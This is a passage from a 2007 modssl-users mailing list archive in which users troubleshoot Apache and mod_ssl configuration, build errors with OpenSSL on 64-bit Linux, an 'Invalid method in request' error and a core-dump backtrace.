	for ; Sun, 25 Feb 2007 18:40:19 +0100 (CET)
Received: by nz-out-0506.google.com with SMTP id o37so1106223nzf
        for ; Sun, 25 Feb 2007 09:39:47 -0800 (PST)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=B4F0kE5Dh9GCA5gm5AjhK2TtVYkTzyrsN70zhhUjl9gJk4xacWSo+B4lYaQEes7hxyHs4OsN7KJ0OdF3BHc2uX2AuyE1ZcPVi9C2aDMd8yCBjpkdH9MP1+8otwpw3cexQnvnmHMS19rNR4Jdair8v7/6H4/L14y926J/KcD9700=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=CCZIUpxdywdB31PmVE8VZya7o2qEjFUGxSijYXWpRiU9cH+hCWndWNCFftnZuAcO8p3KeJ+7s4lsoCWBfWOof1DnByh/0c3hmYfP3caqE3RwqmyOLgllVlF72ba+BealdaeMaoL+9wVJsZQHXkILgJVke4c673JFqhiPpKoAwMU=
Received: by 10.114.60.19 with SMTP id i19mr369804waa.1172425184822;
        Sun, 25 Feb 2007 09:39:44 -0800 (PST)
Received: by 10.114.80.13 with HTTP; Sun, 25 Feb 2007 09:39:44 -0800 (PST)
Message-ID: 
Date: Sun, 25 Feb 2007 18:39:44 +0100
From: "Julius Thyssen" 
To: modssl-users@modssl.org
Subject: Re: More SSL hosts in one ssl.conf
In-Reply-To: <1172423333.3284.30.camel@kermit.wd21.co.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: 
	 <1172423333.3284.30.camel@kermit.wd21.co.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Julius Thyssen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 2/25/07, Michael Pacey  wrote:
> By configuring the new IP address to the machine,

That is already the case. I only have to open a port in iptables.

> adding a Listen directive for the new IP address and port (443), and adding
> a new virtual host for that IP address and port.

Yes, I found out about that, but in executing this there are
no real-life examples I could see, so how does that actually look
in ssl.conf and httpd.conf ?
Since httpd.conf has the "*:80" host entries, and ssl.conf has a
"_default_:443" entry,
what changes to them? Nothing? Can I just add those and not worry
about the rest?
So that I add

Listen xxx.xxx.xxx.xx2:80



to httpd.conf and

Listen xxx.xxx.xxx.xx2:443


to ssl.conf?

The other hosts it listens to are "_default_" and "*", so
how does the server know it's on the right IP-address
for the existing hosts ?

> A rewrite or redirect from
> http to https must be handled within a non-SSL virtual host so you would
> need to create another virtual host for the new IP address on port 80
> and have the appropriate directives within that.

Yes, I have that down. I'm very good with rewrite.

> > my guess is not many servers *can* listen to 2 different IPs.
>
> Apache can and it is very common.

Yes, I made a mistake in wording it there, sorry.

> Don't really understand what you're getting at here... if you mean using
> name based virtual hosting with SSL,

Well, I could use Server aliases for the virtual SSL host
(in fact, I already have), and then make folder aliases
the user goes to with certain requests.
But like I wrote, that's overly complex.

-- 
Adios

Julius
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 25 19:04:08 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6FD9B14D889; Sun, 25 Feb 2007 19:04:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ukfsn.org (s2.ukfsn.org [217.158.120.143])
	by master.modssl.org (Postfix) with ESMTP id 30C3714D82C
	for ; Sun, 25 Feb 2007 19:04:08 +0100 (CET)
Received: from localhost.localdomain (84-45-209-227.no-dns-yet.enta.net [84.45.209.227])
	by mail.ukfsn.org (Postfix) with ESMTP id 884D6E6E0F
	for ; Sun, 25 Feb 2007 18:03:35 +0000 (GMT)
Received: from [192.168.0.15] (helo=kermit.wd21.co.uk)
	by localhost.localdomain with esmtp (Exim 3.36 #1 (Debian))
	id 1HLNVb-0006Sg-00
	for ; Sun, 25 Feb 2007 17:50:03 +0000
Subject: Re: More SSL hosts in one ssl.conf
From: Michael Pacey 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
	 <1172423333.3284.30.camel@kermit.wd21.co.uk>
	 
Content-Type: text/plain
Date: Sun, 25 Feb 2007 18:03:36 +0000
Message-Id: <1172426616.3284.37.camel@kermit.wd21.co.uk>
Mime-Version: 1.0
X-Mailer: Evolution 2.6.3 
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Pacey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, 2007-02-25 at 18:39 +0100, Julius Thyssen wrote:
> On 2/25/07, Michael Pacey  wrote:
> > By configuring the new IP address to the machine,
> 
> That is already the case. I only have to open a port in iptables.
> 
> > adding a Listen directive for the new IP address and port (443), and adding
> > a new virtual host for that IP address and port.
> 
> Yes, I found out about that, but in executing this there are
> no real-life examples I could see, so how does that actually look
> in ssl.conf and httpd.conf ?
> Since httpd.conf has the "*:80" host entries, and ssl.conf has a
> "_default_:443" entry,
> what changes to them? Nothing? Can I just add those and not worry
> about the rest?
> So that I add
> 
> Listen xxx.xxx.xxx.xx2:80
> 
> 
> 
> to httpd.conf and
> 
> Listen xxx.xxx.xxx.xx2:443
> 
> 
> to ssl.conf?

yes.

> The other hosts it listens to are "_default_" and "*", so
> how does the server know it's on the right IP-address
> for the existing hosts ?


Right, why do you have *:80 when you said it is only using one IP
address just now? You should just change this to the first ip address:

NameVirtualHost xxx.xxx.xxx.xx1:80

and then you won't have an issue. From the Apache documentation:

"The special name _default_ can be specified in which case this virtual
host will match any IP address that is not explicitly listed in another
virtual host."

So if you specify the new IP address in your new SSL virtual host, it
won't conflict.
--
Michael

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 28 10:13:49 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AEEB314D888; Wed, 28 Feb 2007 10:13:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.185])
	by master.modssl.org (Postfix) with ESMTP id 3886B14D851
	for ; Wed, 28 Feb 2007 10:13:49 +0100 (CET)
Received: by nf-out-0910.google.com with SMTP id p48so461404nfa
        for ; Wed, 28 Feb 2007 01:13:17 -0800 (PST)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding;
        b=Pnr+7JoXxT6TIQJkA5xtUy5MqHYJPe1QYuLz9ylmKoe/I9f+L1V5XC86cB8L1TrwiteK3wSjHeetAr4ClgurLgZzUsTM4KrI3RxDZkEP8rkxnjtmWtPV3t6UX4t4Led34LzYcSPzFNWe7hwDDq5sgYC5VselMWS3E2o2IhoQed0=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding;
        b=Lx9PXdnHc6j2q9a8DV8EGsTF7UlYqeaQsZr/jCs30BOX67XRRPgTy2SwYAEmptnWMva+jL0xCD/95/nyrDXvw6Z7nc/PVpI4lRtpOfw3rx4qBGng1bSprR3p4R5YnYVg5OVgHrjEWUrd4hA2Jerps34xJ3am6G50+hgRWGZngog=
Received: by 10.48.245.17 with SMTP id s17mr3215837nfh.1172653997086;
        Wed, 28 Feb 2007 01:13:17 -0800 (PST)
Received: from ?192.168.1.102? ( [82.53.167.245])
        by mx.google.com with ESMTP id w5sm1292419mue.2007.02.28.01.13.16;
        Wed, 28 Feb 2007 01:13:16 -0800 (PST)
Message-ID: <45E547AF.9020103@gmail.com>
Date: Wed, 28 Feb 2007 10:13:19 +0100
From: Gianluca Magalotti 
User-Agent: Thunderbird 1.5.0.9 (Windows/20061207)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Build Apache 1.3.37 with mod_ssl on Ubuntu x86_64
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Gianluca Magalotti 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm trying to build apache 1.3.37 with ssl support on a Ubuntu 6.1 
running on a AMD Turion 64.
I've downloaded  the following packages:
Apache 1.3.37 sources (apache_1.3.37.tar.gz from httpd.apache.org)
Mod SSL 2.8.28 (mod_ssl-2.8.28-1.3.37.tar.gz from www.modssl.org)
Open SSL 0.9.8e (openssl-0.9.8e.tar.gz from www.openssl.org)
I've built openssl as described into the INSTALL file provided with 
mod_ssl distribution, using gcc-4.0:
./config no-idea -fPIC no-threads --prefix=/path/to/local/openssl
make
make test
make install
Then I've patched Apache by using (into the mod_ssl directory):
./Configure --with-apache=/path/to/local/apache

then I've switched to the apache tree and configured it as follows:

MM_BASE=/path/to/mm/ \
SSL_BASE=/path/to/local/openssl \
./configure \
    --prefix=/path/to/local/apache \
    --enable-module=most \
    --enable-shared=max \
    --disable-module=auth_dbm \
    --disable-module=cern_meta \
    --disable-module=log_agent \
    --disable-module=log_referer \
    --disable-module=usertrack
make

I received the ld error while linking libssl.so saying that libcrypto.a 
(module x86_64cpuid.o) cannot be relocated, compile with -fPIC (but is 
what I've done).
I've also tried using gcc-3.3 as well as using -fpic instead of -fPIC 
while building openssl.
I've tried to use the DSO version of libcrypto/libssl and compilation 
coes well but when starting apache it stops due to unresolved symbols 
(SSL_xxxx).
I found nothing appropriate on the Internet, because all solutions are 
"rebuild openssl with -fPIC (but is what I'm doing).

Can someone help me?
Thanks in Advance
Gianluca



-- 
*Gianluca Magalotti*   View Gianluca Magalotti's profile on LinkedIn 

Ph: +393489326722
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 28 17:53:30 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9E0B814D878; Wed, 28 Feb 2007 17:53:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from BSCMAIL4VS.bsclogon.buffalostate.edu (bscmail4b.buffalostate.edu [136.183.11.152])
	by master.modssl.org (Postfix) with ESMTP id 2A7EA14D851
	for ; Wed, 28 Feb 2007 17:53:30 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: Invalid method in request
Date: Wed, 28 Feb 2007 11:52:57 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Invalid method in request
Thread-Index: AcdbVHhSYairvB4WRFuE6pojIHgq9gABBZlA
From: "Dege, Robert C." 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dege, Robert C." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I have a 64bit RHEL3 box that I'm trying to configure SSL on.  After
making the appropriate modifications to the httpd.conf file, I restarted
the service, & tested out the setup.

I can get to the site using http://mysite.com:443 (not in secure mode),
but not https://mysite.com.  I get an error message in the logs that
says "Invalid method in request !!!"

Any help would be appreciated.

Red Hat Enterprise v.3 (64bit)
httpd-2.0.46, mod_ssl-2.0.46
openssl-0.9.7a, openssl096b-0.9.6b


Code from httpd.conf file:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D

Listen 0.0.0.0:443


DocumentRoot "/var/www/html"
ServerName www.mysite.com
SSLEngine On

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /etc/httpd/conf/ssl/cert.pem
SSLCertificateKeyFile /etc/httpd/conf/ssl/server.key
SSLCACertificateFile /etc/httpd/conf/ssl/DigiCertSecurityServicesCA.crt


SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0



-Rob
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  1 15:59:41 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 143CA14D89B; Thu,  1 Mar 2007 15:59:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from BSCMAIL4VS.bsclogon.buffalostate.edu (bscmail4b.buffalostate.edu [136.183.11.152])
	by master.modssl.org (Postfix) with ESMTP id 7E23614D863
	for ; Thu,  1 Mar 2007 15:59:40 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: SOLVED: Invalid method in request
Date: Thu, 1 Mar 2007 09:59:06 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SOLVED: Invalid method in request
Thread-Index: AcdbVHhSYairvB4WRFuE6pojIHgq9gABBZlAAC5GuOA=
From: "Dege, Robert C." 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dege, Robert C." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I found the solution to my problem at this website:

https://forum.bytemark.co.uk/viewtopic.php?pid=3D2072

Basically, any VirtualHost entries that are defined in the httpd.conf
file need to have a :80 at the end of them.  i.e.:



to



-Rob

-----Original Message-----
From: Dege, Robert C.=20
Sent: Wednesday, February 28, 2007 11:53 AM
To: 'modssl-users@modssl.org'
Subject: Invalid method in request

Hi,

I have a 64bit RHEL3 box that I'm trying to configure SSL on.  After
making the appropriate modifications to the httpd.conf file, I restarted
the service, & tested out the setup.

I can get to the site using http://mysite.com:443 (not in secure mode),
but not https://mysite.com.  I get an error message in the logs that
says "Invalid method in request !!!"

Any help would be appreciated.

Red Hat Enterprise v.3 (64bit)
httpd-2.0.46, mod_ssl-2.0.46
openssl-0.9.7a, openssl096b-0.9.6b


Code from httpd.conf file:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D

Listen 0.0.0.0:443


DocumentRoot "/var/www/html"
ServerName www.mysite.com
SSLEngine On

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /etc/httpd/conf/ssl/cert.pem
SSLCertificateKeyFile /etc/httpd/conf/ssl/server.key
SSLCACertificateFile /etc/httpd/conf/ssl/DigiCertSecurityServicesCA.crt


SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0



-Rob
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  7 10:02:12 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0E21F14D87B; Wed,  7 Mar 2007 10:02:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.172])
	by master.modssl.org (Postfix) with ESMTP id 8AEC914D833
	for ; Wed,  7 Mar 2007 10:02:11 +0100 (CET)
Received: by ug-out-1314.google.com with SMTP id 80so659801ugb
        for ; Wed, 07 Mar 2007 01:01:38 -0800 (PST)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type;
        b=gAWm3lzek1PV9ygxDrILOMVLYeUsoKwYZSN8aZwh8zpVbF4Eaf14UyAGjPz/Bmcifr73xIt4HpiS+EfsCgJ+pu+Q4vulKld2FbmK02fn/L0id1+N8d3GqV9/rtoAms6preIn2aShLbgOGiI+KiFqu7/s4MQzEIAAhvBp+zRheoY=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=HmVSoNgLuKy62QN8i4HrBL9qbu7YreOH9LRK3+8nm/yE4mMLO64bDHnav0ps4qBTjHI7su6KaSQhmhMHMix9wABL7ApOgSYRbAhZOPbqUpVXcweXfvv4czx4xujPWvwxwtjGY/XqzRYJa3N5xXjif1qauGPcEQ2yeYeo3yoMauo=
Received: by 10.114.201.1 with SMTP id y1mr2082449waf.1173258097233;
        Wed, 07 Mar 2007 01:01:37 -0800 (PST)
Received: by 10.115.107.8 with HTTP; Wed, 7 Mar 2007 01:01:37 -0800 (PST)
Message-ID: <24b8c8d00703070101g790a9920xc2d8b8309840b388@mail.gmail.com>
Date: Wed, 7 Mar 2007 14:31:37 +0530
From: "pradeep kumar" 
To: modssl-users@modssl.org
Subject: Core dump with mod_ssl
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_208062_26070506.1173258097207"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "pradeep kumar" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_208062_26070506.1173258097207
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,

When I use mod_ssl and test it with RoadRunner it dumps core. The details
are given below.

$ openssl version
OpenSSL 0.9.8d 28 Sep 2006
$ httpd -v
Server version: Apache/2.0.58  HP-UX_Apache-based_Web_Server
Server built:   Dec 20 2006 13:10:19
$

(gdb) bt

#0 0xc0214508 in kill+0x10 ()

#1 0x4e9f4 in sig_coredump+0x88 ()

#2 

#3 0xc0c3141c in ASN1_STRING_free+0x14 ()

#4 0xc0c989c8 in ASN1_primitive_free+0x68 ()

#5 0xc0c98834 in asn1_item_combine_free+0x3dc ()

#6 0xc0c987e0 in asn1_item_combine_free+0x388 ()

#7 0xc0c98388 in ASN1_item_free+0x20 ()

#8 0xc0c2bc50 in X509_free+0x18 ()

#9 0xc0be0b2c in SSL_SESSION_free+0xac ()

#10 0xc0bd96e4 in SSL_free+0x124 ()

#11 0xc0bbb64c in ssl_filter_io_shutdown+0x14c ()

#12 0xc0bbc0dc in ssl_io_filter_output+0x1fc ()

#13 0x4fa14 in ap_pass_brigade+0x6c ()

#14 0x4c114 in ap_flush_conn+0x84 ()

#15 0x4c1f8 in ap_lingering_close+0x60 ()

#16 0x3a310 in process_socket+0xb8 ()

#17 0x3aec8 in worker_thread+0x1e0 ()

#18 0xc0522f54 in dummy_worker+0x1c ()

#19 0xc0094024 in __pthread_bound_body+0xa8 ()

#20 0xc00c4ab4 in __pthread_bound_start+0x14 ()


Does it have to do anything with some pointer alignment problem? Let me know
if more details is needed.

Thanks in advance,
Pradeep

------=_Part_208062_26070506.1173258097207
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


Hi,


 


When I use mod_ssl and test it with RoadRunner it dumps core. The details are given below.


 


$ openssl version
OpenSSL 0.9.8d 28 Sep 2006
$ httpd -v
Server version: Apache/2.0.58  HP-UX_Apache-based_Web_Server
Server built:   Dec 20 2006 13:10:19


$ 


(gdb) bt


#0 0xc0214508 in kill+0x10 () 


#1 0x4e9f4 in sig_coredump+0x88 ()


#2 <signal handler called>


#3 0xc0c3141c in ASN1_STRING_free+0x14 () 


#4 0xc0c989c8 in ASN1_primitive_free+0x68 () 


#5 0xc0c98834 in asn1_item_combine_free+0x3dc () 


#6 0xc0c987e0 in asn1_item_combine_free+0x388 () 


#7 0xc0c98388 in ASN1_item_free+0x20 () 


#8 0xc0c2bc50 in X509_free+0x18 () 


#9 0xc0be0b2c in SSL_SESSION_free+0xac () 


#10 0xc0bd96e4 in SSL_free+0x124 () 


#11 0xc0bbb64c in ssl_filter_io_shutdown+0x14c () 


#12 0xc0bbc0dc in ssl_io_filter_output+0x1fc () 


#13 0x4fa14 in ap_pass_brigade+0x6c ()


#14 0x4c114 in ap_flush_conn+0x84 ()


#15 0x4c1f8 in ap_lingering_close+0x60 ()


#16 0x3a310 in process_socket+0xb8 ()


#17 0x3aec8 in worker_thread+0x1e0 ()


#18 0xc0522f54 in dummy_worker+0x1c () 


#19 0xc0094024 in __pthread_bound_body+0xa8 ()


#20 0xc00c4ab4 in __pthread_bound_start+0x14 () 


 


Does it have to do anything with some pointer alignment problem? Let me know if more details is needed.


 


Thanks in advance,


Pradeep



 


------=_Part_208062_26070506.1173258097207--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  7 10:50:31 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 54E9114D886; Wed,  7 Mar 2007 10:50:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.171])
	by master.modssl.org (Postfix) with ESMTP id F086F14D853
	for ; Wed,  7 Mar 2007 10:50:30 +0100 (CET)
Received: by ug-out-1314.google.com with SMTP id 80so677325ugb
        for ; Wed, 07 Mar 2007 01:49:54 -0800 (PST)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding;
        b=WAX/J9Lyv/rQm2mpOkzC7XY4P04xwTTKc2DRoEnoRd4zI6/P1rjRXk05B7FoQNeSvZxQdcXWD+kpANAT7xCbkIrRrLZLCrhWVwI4z0sfoj0bTJUyF8ImzPXGv6eYFHNVJLZc9DL00hgaV9J0nmwHSS0GSGPraBxGJh5AHLSCLkk=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding;
        b=bM0D1Z9q/Kr/3c/y4TgRFB6x77M4s6WdFffmuAhjGZDsa3T8tdejDjTvmYthG/FyzWHths1PdMk8f1wifKw8GLBx+kjr6ponOMSlnU4JUHVfmxwlb74xlYWJlcGuR4fxlKsKshmVIYU4aHNxrn9tpLLz9DpCM2cB23xzwXmzNA0=
Received: by 10.67.21.11 with SMTP id y11mr3912897ugi.1173260994626;
        Wed, 07 Mar 2007 01:49:54 -0800 (PST)
Received: from ?62.11.15.25? ( [62.11.15.25])
        by mx.google.com with ESMTP id m4sm1347414ugc.2007.03.07.01.49.36;
        Wed, 07 Mar 2007 01:49:54 -0800 (PST)
Message-ID: <45EE8B0F.90201@gmail.com>
Date: Wed, 07 Mar 2007 10:51:11 +0100
From: Gianluca Magalotti 
User-Agent: Thunderbird 1.5.0.10 (Windows/20070221)
MIME-Version: 1.0
To:  owner-modssl-users@modssl.org,  modssl-users@modssl.org
Subject: Build Apache 1.3.37 with mod_ssl on Ubuntu x86_64
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Gianluca Magalotti 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm trying to build apache 1.3.37 with ssl support on a Ubuntu 6.1 
running on a AMD Turion 64.
I've downloaded  the following packages:
Apache 1.3.37 sources (apache_1.3.37.tar.gz from httpd.apache.org)
Mod SSL 2.8.28 (mod_ssl-2.8.28-1.3.37.tar.gz from www.modssl.org)
Open SSL 0.9.8e (openssl-0.9.8e.tar.gz from www.openssl.org)
I've built openssl as described into the INSTALL file provided with 
mod_ssl distribution, using gcc-4.0:
./config no-idea -fPIC no-threads --prefix=/path/to/local/openssl
make
make test
make install
Then I've patched Apache by using (into the mod_ssl directory):
./Configure --with-apache=/path/to/local/apache

then I've switched to the apache tree and configured it as follows:

MM_BASE=/path/to/mm/ \
SSL_BASE=/path/to/local/openssl \
./configure \
   --prefix=/path/to/local/apache \
   --enable-module=most \
   --enable-shared=max \
   --disable-module=auth_dbm \
   --disable-module=cern_meta \
   --disable-module=log_agent \
   --disable-module=log_referer \
   --disable-module=usertrack
make

I received the ld error while linking libssl.so saying that libcrypto.a 
(module x86_64cpuid.o) cannot be relocated, compile with -fPIC (but is 
what I've done).
I've also tried using gcc-3.3 as well as using -fpic instead of -fPIC 
while building openssl.
I've tried to use the DSO version of libcrypto/libssl and compilation 
coes well but when starting apache it stops due to unresolved symbols 
(SSL_xxxx).
I found nothing appropriate on the Internet, because all solutions are 
"rebuild openssl with -fPIC (but is what I'm doing).

Can someone help me?
Thanks in Advance
Gianluca


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 15 12:23:07 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DA6A014D873; Thu, 15 Mar 2007 12:23:07 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from correo10.acens.net (correo10.acens.net [217.116.0.37])
	by master.modssl.org (Postfix) with ESMTP id 7C83A14D843
	for ; Thu, 15 Mar 2007 12:23:07 +0100 (CET)
Received: (qmail 518 invoked from network); 15 Mar 2007 11:22:33 -0000
Received: from unknown (HELO [192.168.1.45]) (bittor.mmchannel.com@[80.59.161.219])
          (envelope-sender )
          by correo10.acens.net (qmail-ldap-1.03) with SMTP
          for ; 15 Mar 2007 11:22:33 -0000
Message-ID: <45F92BFF.4070006@mmchannel.com>
Date: Thu, 15 Mar 2007 12:20:31 +0100
From: =?ISO-8859-1?Q?Bittor_Ruiz_de_Az=FAa?= 
User-Agent: Thunderbird 1.5.0.10 (Windows/20070221)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Apache 2.0.59 with mod_ssl
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Bittor_Ruiz_de_Az=FAa?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi there,

    I have installed Apache 2.0.59 from the sourcecode with the mod_jk 
module, but no I have a problem since I want ( I need) to install the 
mod_ssl module but I don't want to recompile or reinstall the whole 
Apache. Is it possible to do so? Is there any way of compiling only the 
module or to get it from a RPM or something like that. Maybe compiling 
the whole Apache but without installing it and moving the mod_ssl.so 
library to the aproppiate directory? I'm working with a RedHat Linux. 
Thanks in advance. Any help or advice will be great. Thanks again,


Bittor.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 19 17:22:44 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2B6EA14D870; Mon, 19 Mar 2007 17:22:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.186])
	by master.modssl.org (Postfix) with ESMTP id 6F5E214D836
	for ; Mon, 19 Mar 2007 17:22:43 +0100 (CET)
Received: by nf-out-0910.google.com with SMTP id p48so1028508nfa
        for ; Mon, 19 Mar 2007 09:22:08 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
